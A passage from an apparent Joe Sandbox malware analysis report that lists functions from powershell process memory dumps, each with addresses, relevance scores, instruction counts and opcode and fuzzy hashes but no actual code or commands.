                                                                                    • Instruction ID: 880e0b4c65b3b4c26d3f7291b2c883f7d573587383a9c34bc599ed1ff384b688
                                                                                    • Opcode Fuzzy Hash: 0980bd8f172748c1c8277bac2fe22fb4aa1fa47b400d2503e00b8a08a1df0683
                                                                                    • Instruction Fuzzy Hash: 76A13432B0EBDE0FEBA6976848756B47BD1EF55210F0A00FAC46DC71E3D959AC058741
                                                                                    Function 00007FFD9B9ECF75 Relevance: .7, Instructions: 681COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c45420372f7aa5fbfd36aaa844812fda87ce85690d4695c90a414ce3c0fe9d1
                                                                                    • Instruction ID: 15bf428ef5a327d978ff4d596ec01746920febbb4a7fb6a47163ca65bbb89fd6
                                                                                    • Opcode Fuzzy Hash: 7c45420372f7aa5fbfd36aaa844812fda87ce85690d4695c90a414ce3c0fe9d1
                                                                                    • Instruction Fuzzy Hash: EC327330A18A4D8FDF98EF5CC4A5AA97BE1FFA8300F154169D409D7296CB35F981CB81
                                                                                    Function 00007FFD9BAB9D4C Relevance: .4, Instructions: 424COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b5ec8d85a6f37ef435de49ff05fd3f537bfc4d629165ee2546c26a9c2f209340
                                                                                    • Instruction ID: 435d022f1971d3e81bef9b62cc3d433138b9a5376038e0befbf5a6c919efe22a
                                                                                    • Opcode Fuzzy Hash: b5ec8d85a6f37ef435de49ff05fd3f537bfc4d629165ee2546c26a9c2f209340
                                                                                    • Instruction Fuzzy Hash: 56E12732A0FB991FE7A5976888756747BE1EF56210F1A00FED0ACC71E3DE186C458742
                                                                                    Function 00007FFD9BABA55C Relevance: .4, Instructions: 420COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8ecdbde84f40c3e6d39abf78fecfb59eb8f6cc93b52580068be3aba56b4cd9b3
                                                                                    • Instruction ID: 8d18d55320578b03aac2134bae811d4df8f84452bd9869e283527c8125f23deb
                                                                                    • Opcode Fuzzy Hash: 8ecdbde84f40c3e6d39abf78fecfb59eb8f6cc93b52580068be3aba56b4cd9b3
                                                                                    • Instruction Fuzzy Hash: AAE12872A0EB9D0FE7659B6888751687BE1EF56210F1A00FED0ACC71E3DE286D458B41
                                                                                    Function 00007FFD9BAB90F8 Relevance: .4, Instructions: 412COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9d3542eaca607e4cb415339dcf360357b10bc51cf6b51d322dc8fa9fa5d4751a
                                                                                    • Instruction ID: 9153995c0736c7fd381420a10b30c2f25c243221e495bd8ee600ab56aba0220b
                                                                                    • Opcode Fuzzy Hash: 9d3542eaca607e4cb415339dcf360357b10bc51cf6b51d322dc8fa9fa5d4751a
                                                                                    • Instruction Fuzzy Hash: A3D13832B0EB990FE7A5976848692787BE1EF52210F1900FED0ACC71E3DE596D45CB41
                                                                                    Function 00007FFD9BAB9854 Relevance: .4, Instructions: 397COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8d026b40d2d87087da167be85880093af5017bdf0b909f7397f2dae8bfe45c17
                                                                                    • Instruction ID: 40b46ced9e748530f68d27cb2323c01abb5d3e3412b4e1bc6f4b0a5ca07e385e
                                                                                    • Opcode Fuzzy Hash: 8d026b40d2d87087da167be85880093af5017bdf0b909f7397f2dae8bfe45c17
                                                                                    • Instruction Fuzzy Hash: ABC15722B0EA990FEBA5DB6944A85747BE1EF56310F0A00FFC06CC71E3DA59AD05C781
                                                                                    Function 00007FFD9BAB41C9 Relevance: .4, Instructions: 381COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e65669ab5db3408f6bd68dae0369065e8c03c93672b785f8917b8a541f742643
                                                                                    • Instruction ID: d67b47c2733335d9abe3e5cc4f0495c166e243a4887711050be0369fd894e77a
                                                                                    • Opcode Fuzzy Hash: e65669ab5db3408f6bd68dae0369065e8c03c93672b785f8917b8a541f742643
                                                                                    • Instruction Fuzzy Hash: 98B10232B0EA9E0FE7A99768587267536D1EF91310F0A01BED46DC31F3DE59A9018741
                                                                                    Function 00007FFD9B9EB4E6 Relevance: .3, Instructions: 335COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cdc65bbfb2c214303cb8895bde4124611969da9cbd28137b307c8d99dc491e14
                                                                                    • Instruction ID: b2e1119f93c38896077dd35870018549c625a258493a7afa54e26eafcf283415
                                                                                    • Opcode Fuzzy Hash: cdc65bbfb2c214303cb8895bde4124611969da9cbd28137b307c8d99dc491e14
                                                                                    • Instruction Fuzzy Hash: 1AB1C63061DA4D4FDB68DF28C8957E93BE1FF59310F04426EE84EC72A5CE7499418B82
                                                                                    Function 00007FFD9BAB988C Relevance: .3, Instructions: 334COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d8da609fc1feb63eeaf3b6bb5fd02bd6ee8cce6850f0fbc2a3709492df6ec270
                                                                                    • Instruction ID: 2fb77c6c19102483a28d4353934e6ed1b840a208d53a364d9cdca940e0b3a397
                                                                                    • Opcode Fuzzy Hash: d8da609fc1feb63eeaf3b6bb5fd02bd6ee8cce6850f0fbc2a3709492df6ec270
                                                                                    • Instruction Fuzzy Hash: EEA12622A0FBD90FE7A69BA944A81743BE1EF56310F0A00FED46CCB1E3D959AD45C741
                                                                                    Function 00007FFD9BABA26A Relevance: .2, Instructions: 197COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1bfaf44c75ebe1db0ec810500fecaee68816e981fc0ee1ddb9be0c27d02066ed
                                                                                    • Instruction ID: 90c64dbd44d8949faa3648d4c726011b93145113b4e9779c57b63085591aa4db
                                                                                    • Opcode Fuzzy Hash: 1bfaf44c75ebe1db0ec810500fecaee68816e981fc0ee1ddb9be0c27d02066ed
                                                                                    • Instruction Fuzzy Hash: 71512632B0EA9D4FEBA2D7A888605A47BE1EF55210F0901FBD06CC70F3DE59AD458741
                                                                                    Function 00007FFD9BAB8C7C Relevance: .2, Instructions: 189COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cae34e42d324d6e68e1999e28630a7cadae0f7294d6de9ecec2bbcd86a88785f
                                                                                    • Instruction ID: 4df1e37a560ce4a414420d2881b6cb454020a4fa885323a7187c9a315d410fcd
                                                                                    • Opcode Fuzzy Hash: cae34e42d324d6e68e1999e28630a7cadae0f7294d6de9ecec2bbcd86a88785f
                                                                                    • Instruction Fuzzy Hash: BB510821B1EA9E4FE7A5976C446113437D1EF66320F0A01FBD45DC71A3DD69ED018781
                                                                                    Function 00007FFD9BABA2AC Relevance: .1, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a33c760b71851908170f53eb4aa498710c5e53692ec00747e473fd10ed4ae403
                                                                                    • Instruction ID: eca7f0b0846bed3a0ba53a24852a3bf2381c25015d0497446ff90bc7510a9660
                                                                                    • Opcode Fuzzy Hash: a33c760b71851908170f53eb4aa498710c5e53692ec00747e473fd10ed4ae403
                                                                                    • Instruction Fuzzy Hash: DD41D336A0EBDD0FEBA6DB6888641647FA1EF56210F0900FBD098CB1F3DD586D498711
                                                                                    Function 00007FFD9BAB8F6C Relevance: .1, Instructions: 119COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b0476c0ea4edf95cf173a6b755495bb3a216aedcb91b496acd4a548db0bfa4de
                                                                                    • Instruction ID: 2267147565a4c02919e664b6e696f9467cb0db97f97978f5e035cb3d69c72bc9
                                                                                    • Opcode Fuzzy Hash: b0476c0ea4edf95cf173a6b755495bb3a216aedcb91b496acd4a548db0bfa4de
                                                                                    • Instruction Fuzzy Hash: EF41C522A0FBDA0FEBA6976848A55747BE1EF57310F0A00FAC0A8CB1E3D9585D498751
                                                                                    Function 00007FFD9BAB9AA0 Relevance: .1, Instructions: 119COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 33db4934de55a44dbe2bc496540decbf7523f955dd6fa74ae649695322d4451d
                                                                                    • Instruction ID: 1edaa9266dff0968a5766d8913be865064b4b118ea8e3d081b7b515fe84ebe2b
                                                                                    • Opcode Fuzzy Hash: 33db4934de55a44dbe2bc496540decbf7523f955dd6fa74ae649695322d4451d
                                                                                    • Instruction Fuzzy Hash: B141D731A0EBD94FEB62EBA848A85747BE1EF56210F0A00FAD468C71E3D9595D44C741
                                                                                    Function 00007FFD9BAB5382 Relevance: .1, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2e5f031239a4e0ea242731700d4da9a908ec7e98888384055867188c0a83155d
                                                                                    • Instruction ID: 849e52cfa3d0a52c66bc98704d9bf5031b8aa2d43598d028d36b680ccad61b17
                                                                                    • Opcode Fuzzy Hash: 2e5f031239a4e0ea242731700d4da9a908ec7e98888384055867188c0a83155d
                                                                                    • Instruction Fuzzy Hash: DC310523F1FAEE0BE7BA93581C722B866C1AF51215F5A00FAD46DC72E3DD896C044741
                                                                                    Function 00007FFD9BAB89E7 Relevance: .1, Instructions: 105COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13bfe32692375f9f3a2e037053303bbde2feee9c4f5da859f0d9d6a12aab19f8
                                                                                    • Instruction ID: 8287387f96e9009ee289be37eeff220bc0ff3505292ae731a5a99401d0e45338
                                                                                    • Opcode Fuzzy Hash: 13bfe32692375f9f3a2e037053303bbde2feee9c4f5da859f0d9d6a12aab19f8
                                                                                    • Instruction Fuzzy Hash: 4A210222B0DA1E4AE775925CB8222F977C0EFC4231F17127AD46EC3296DE19A9468681
                                                                                    Function 00007FFD9BAB4354 Relevance: .1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f6a70053928ab92c5691f0851e1a1989e7c602c4989cb12fe81f0891aeff5a10
                                                                                    • Instruction ID: c7fd9697bdcafcd5b92f768e4c6eb208de7671de07b9590bff3136d6e9f28eb0
                                                                                    • Opcode Fuzzy Hash: f6a70053928ab92c5691f0851e1a1989e7c602c4989cb12fe81f0891aeff5a10
                                                                                    • Instruction Fuzzy Hash: 80212523B0FA9E0BE3B9A768147527866C2EF90310F4E00BED16DC32F3DD59AC015601
                                                                                    Function 00007FFD9B9EAFE4 Relevance: .1, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 53d9f9edfc8d5063f211068f34dda183038b42c07bbad51dc0ef3e2b658d4dfd
                                                                                    • Instruction ID: 453ab3f3ab344aac4dc14957bcd256e48f7c9b6b382cbd4e09ee2e079a2c9b43
                                                                                    • Opcode Fuzzy Hash: 53d9f9edfc8d5063f211068f34dda183038b42c07bbad51dc0ef3e2b658d4dfd
                                                                                    • Instruction Fuzzy Hash: 88312130A2A54D9EFBB49F54CCA6BF93390FF4231AF410138D45E861A6CA397B45CB51
                                                                                    Function 00007FFD9BAB121F Relevance: .1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: de64a9975fd9f5e1f8614264f2806352d08c328f48d47ead954340bb1327edbc
                                                                                    • Instruction ID: 30d6d4f51dab1f163c04207903fcf4d962652c683427e4bc2b0b03587957d47f
                                                                                    • Opcode Fuzzy Hash: de64a9975fd9f5e1f8614264f2806352d08c328f48d47ead954340bb1327edbc
                                                                                    • Instruction Fuzzy Hash: 7321F552F0FAD90FE7A1A37818A90A87B91DF66244F0940FEC0A9CB1E3DC595C058712
                                                                                    Function 00007FFD9B9E3945 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                                                    • Instruction ID: fdcf9836d8336b079225b86303ccad4adc9c41f663afb1ccdd722c35c8e15d68
                                                                                    • Opcode Fuzzy Hash: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                                                    • Instruction Fuzzy Hash: 8E01677121CB0C8FD748EF0CE451AA5B7E0FB95364F10056DE58AC36A5D736E981CB45

                                                                                    Executed Functions

                                                                                    Function 04D6E928 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \V'm
                                                                                    • API String ID: 0-560501380
                                                                                    • Opcode ID: 395fa705b520210440f6ebbf147bbe8907128008220e030380730bcdab804d87
                                                                                    • Instruction ID: 077e0753d44f3ec46ec196d4da77ce8c97773c24f491d8d3725c1db0be5f6405
                                                                                    • Opcode Fuzzy Hash: 395fa705b520210440f6ebbf147bbe8907128008220e030380730bcdab804d87
                                                                                    • Instruction Fuzzy Hash: 0FB13E74E00219CFDF14CFA9D8857AEBBF2BF88314F148529D816E7294EB74A845CB91
                                                                                    Function 04D6F1F8 Relevance: .3, Instructions: 266COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2e34aa33b1f9e3a6214e7f27aac68153402bf8f2233562139678bc63086256da
                                                                                    • Instruction ID: a9b15a19c810fe96dded8fea7cf60bca48a91c831ff1c2d444beedbccdea491c
                                                                                    • Opcode Fuzzy Hash: 2e34aa33b1f9e3a6214e7f27aac68153402bf8f2233562139678bc63086256da
                                                                                    • Instruction Fuzzy Hash: 9BB14D71E006098FDF10CFA9E89579DBBF2BF88314F14852DE856E7294EB74A845CB81
                                                                                    Function 04D69488 Relevance: .2, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 94767a4154cb6e1c9c3923cc3e0b513935caca9643d1e680d0c768f5cb45dcc4
                                                                                    • Instruction ID: 8a508831a9b420c317752fc22f60f69577741f9e7d9c6af0bc72dbfaa8122d1a
                                                                                    • Opcode Fuzzy Hash: 94767a4154cb6e1c9c3923cc3e0b513935caca9643d1e680d0c768f5cb45dcc4
                                                                                    • Instruction Fuzzy Hash: 7D71BC70A00209CFCB14EF68D494A9EBBF2FF84310F248569E41AEB655DB74EC46CB80
                                                                                    Function 04D6AE30 Relevance: 10.5, Strings: 8, Instructions: 520COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8N'm$Hbq$h]'m$h]'m$h]'m$$^q$$^q$I'm
                                                                                    • API String ID: 0-3095141069
                                                                                    • Opcode ID: 0ae75dfba96ab85e9710f7b65d11c4b4954fea3921981547b7098440767c80d4
                                                                                    • Instruction ID: 96568cb323ca8188c45319e9e1c84a9a104d834ace8de0583b6ff71bc6340bfd
                                                                                    • Opcode Fuzzy Hash: 0ae75dfba96ab85e9710f7b65d11c4b4954fea3921981547b7098440767c80d4
                                                                                    • Instruction Fuzzy Hash: 6C226234B002688FCB25DB25C9546AEB7B2FF89304F1180A9D54AAB361DF35ED85CF81
                                                                                    Function 04D6EF64 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \V'm$\V'm
                                                                                    • API String ID: 0-1799062343
                                                                                    • Opcode ID: 9986faadcc62ed5e06a4f2b124d29215607f8da52825261d8347b7f87f95801b
                                                                                    • Instruction ID: 3c1b9f08814d402eccae5b24006db9f46d66eeba55d45313c481f37898c0007f
                                                                                    • Opcode Fuzzy Hash: 9986faadcc62ed5e06a4f2b124d29215607f8da52825261d8347b7f87f95801b
                                                                                    • Instruction Fuzzy Hash: DE715AB1E00609DFDB10CFA8D9857DEBBF2BF88314F148129E416A7254EB74A846CF91
                                                                                    Function 04D6EF70 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \V'm$\V'm
                                                                                    • API String ID: 0-1799062343
                                                                                    • Opcode ID: 48b63502adae8840c5925c5f82fb25b9e43b31d36855aa84d55b9ac0e3ea3f0f
                                                                                    • Instruction ID: 6c51d00fe3b4a229108d4b5032cd6cd1d47a103182bdabe5509ae2fe5f9cf61a
                                                                                    • Opcode Fuzzy Hash: 48b63502adae8840c5925c5f82fb25b9e43b31d36855aa84d55b9ac0e3ea3f0f
                                                                                    • Instruction Fuzzy Hash: 1D714A71E00609DFDF14CFA9D88579EBBF2BF88314F148129E416A7254EB78A846CF91
                                                                                    Function 04D6E91D Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \V'm
                                                                                    • API String ID: 0-560501380
                                                                                    • Opcode ID: 4590e8c41e9f6e92423425049cbcae37dd6192b326636b4f70e54eba0636c428
                                                                                    • Instruction ID: 64d670ec013622660f5091a2e5dee2d45f4a5c65423ec84644f4af0f7ee5c1d6
                                                                                    • Opcode Fuzzy Hash: 4590e8c41e9f6e92423425049cbcae37dd6192b326636b4f70e54eba0636c428
                                                                                    • Instruction Fuzzy Hash: 0DB14C74E00219DFDB20CFA9D8857EEBBF1BF48314F148129E856A7294EB74A845CB91
                                                                                    Function 04D68528 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: x
                                                                                    • API String ID: 0-2363233923
                                                                                    • Opcode ID: 6fa5482fe974f3698a2d8ee771a468e6ad4cab41f738895511eb098db04889a1
                                                                                    • Instruction ID: 1af7bdca0635742cbf44c35a904dfaa61870b1a21835c61d5399fafa6dbfb2d7
                                                                                    • Opcode Fuzzy Hash: 6fa5482fe974f3698a2d8ee771a468e6ad4cab41f738895511eb098db04889a1
                                                                                    • Instruction Fuzzy Hash: DE81A234A062449FCB15DFB8D4849ADBBF2FF89314F1484A9E4469B362CB35EC85DB50
                                                                                    Function 04D68CC0 Relevance: .3, Instructions: 317COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dbd40ce9610ef40054c1b58c2d1ac47b1ce6dbd69a48a037e7df6ea1069b5bf9
                                                                                    • Instruction ID: 62d054f999ecd6c167a33b89ffc414ece1f20ad8c750c18cf434d031a492bb99
                                                                                    • Opcode Fuzzy Hash: dbd40ce9610ef40054c1b58c2d1ac47b1ce6dbd69a48a037e7df6ea1069b5bf9
                                                                                    • Instruction Fuzzy Hash: 53C19D35B002489FDB14EFA4D958A9DBBF6FF85314F258159E806AF265CB34EC49CB40
                                                                                    Function 04D631C8 Relevance: .3, Instructions: 304COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bd9ce91f28e84d17019ebc75a21cd41c0f7ae9cd7420e1e6628a02fe1a68d5ec
